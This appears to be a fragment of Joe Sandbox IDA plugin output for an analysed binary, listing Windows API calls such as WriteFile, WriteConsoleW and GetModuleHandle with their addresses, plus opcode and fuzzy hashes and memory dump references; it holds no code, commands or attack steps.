                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID: api-ms-
                    • API String ID: 3177248105-2084034818
                    • Opcode ID: fef44e316484ff0b8cb5e356f7fae871a792c8a2d21eeec1e59d1aedfe9f4b0f
                    • Instruction ID: ebd7c99ba10df37487fad75ada9705b96682029b9a8e9d6bd2c9cfa5c7c92995
                    • Opcode Fuzzy Hash: fef44e316484ff0b8cb5e356f7fae871a792c8a2d21eeec1e59d1aedfe9f4b0f
                    • Instruction Fuzzy Hash: 5DE09270344304B6DF301F60FE06B593A659B24B44F144420F90CE40E1DB65DA91A5B0
                    APIs
                    • GetConsoleOutputCP.KERNEL32(8DDD1821,00000000,00000000,00000008), ref: 00D1D1A0
                      • Part of subcall function 00D1A799: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D1CE1B,?,00000000,-00000008), ref: 00D1A7FA
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D1D3F2
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D1D438
                    • GetLastError.KERNEL32 ref: 00D1D4DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                    • String ID:
                    • API String ID: 2112829910-0
                    • Opcode ID: d89972d82e9dab11531bdd568c8e5884d91ce0ea05c0eb5f8802589a2fb6f782
                    • Instruction ID: 21dc32d38124f45c149aa219b09ea7b2f05727074536e88615831d1e34af1b09
                    • Opcode Fuzzy Hash: d89972d82e9dab11531bdd568c8e5884d91ce0ea05c0eb5f8802589a2fb6f782
                    • Instruction Fuzzy Hash: FFD16E75D04258AFCB15CFA8E8849EDBBB6FF09310F18456AE455EB351DB30A982CB60
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 6e2b9ddf69d4d00d852d51e4bd51043074f20cb547ed61f0e81a3659423aecf8
                    • Instruction ID: e2b4d1dde15d56f8864355bc2d251999dbeda4e5b31ab6972d074251f6e42634
                    • Opcode Fuzzy Hash: 6e2b9ddf69d4d00d852d51e4bd51043074f20cb547ed61f0e81a3659423aecf8
                    • Instruction Fuzzy Hash: 49519D72604706FFEB298F10F951BEA77A4EF48310F184169E94547295EF32E8C1C6B0
                    APIs
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00D1E0D0,00000000,00000001,?,00000008,?,00D1D52F,00000008,00000000,00000000), ref: 00D1E92D
                    • GetLastError.KERNEL32(?,00D1E0D0,00000000,00000001,?,00000008,?,00D1D52F,00000008,00000000,00000000,00000008,00000008,?,00D1DAD2,00000000), ref: 00D1E939
                      • Part of subcall function 00D1E8FF: CloseHandle.KERNEL32(FFFFFFFE,00D1E949,?,00D1E0D0,00000000,00000001,?,00000008,?,00D1D52F,00000008,00000000,00000000,00000008,00000008), ref: 00D1E90F
                    • ___initconout.LIBCMT ref: 00D1E949
                      • Part of subcall function 00D1E8C1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D1E8F0,00D1E0BD,00000008,?,00D1D52F,00000008,00000000,00000000,00000008), ref: 00D1E8D4
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00D1E0D0,00000000,00000001,?,00000008,?,00D1D52F,00000008,00000000,00000000,00000008), ref: 00D1E95E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 056b38f83c091c32d941875ec5be663a06a55d7ea95d65d9ce4582269e73fe8d
                    • Instruction ID: c06f0156fdf90ac3d05d097de18a28628b0ef96c5ee1fac9504e4b6829927d9b
                    • Opcode Fuzzy Hash: 056b38f83c091c32d941875ec5be663a06a55d7ea95d65d9ce4582269e73fe8d
                    • Instruction Fuzzy Hash: 61F0AC36501258BBCF722F95EC04AD97F66FB593B1B044051FE19D5221CA32D961EBB0
                    APIs
                    • EncodePointer.KERNEL32(00000000,?), ref: 00D165B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: EncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 2118026453-2084237596
                    • Opcode ID: 947a34762f0c6655ad64a819b912f2882d97db0595193b88740f80ed4dee3e35
                    • Instruction ID: 7a646aea0851af03a4fd27eab7e518929e12fb02d423789c748e3d23fe02a42b
                    • Opcode Fuzzy Hash: 947a34762f0c6655ad64a819b912f2882d97db0595193b88740f80ed4dee3e35
                    • Instruction Fuzzy Hash: 0E416872900209FFCF15DF98E981AEEBBB5FF48304F184099F905A6215DB35D990DB61
                    APIs
                    • GetModuleHandleA.KERNEL32(kernel32), ref: 00D1111B
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00D11162
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID: kernel32
                    • API String ID: 4139908857-541877477
                    • Opcode ID: 5f1660116de888cc0302fa6a76f9faf16aee646de50b2d856854b7d5ad09ab05
                    • Instruction ID: 85755a8c8ab7fa42f4691436a87129e0392d586d34cbf56dcae6a12cc736934e
                    • Opcode Fuzzy Hash: 5f1660116de888cc0302fa6a76f9faf16aee646de50b2d856854b7d5ad09ab05
                    • Instruction Fuzzy Hash: AB21C8B9D00208FBCB04DFE4D945AEEBBB4EF48304F148558EA05A7240EA349A85CB71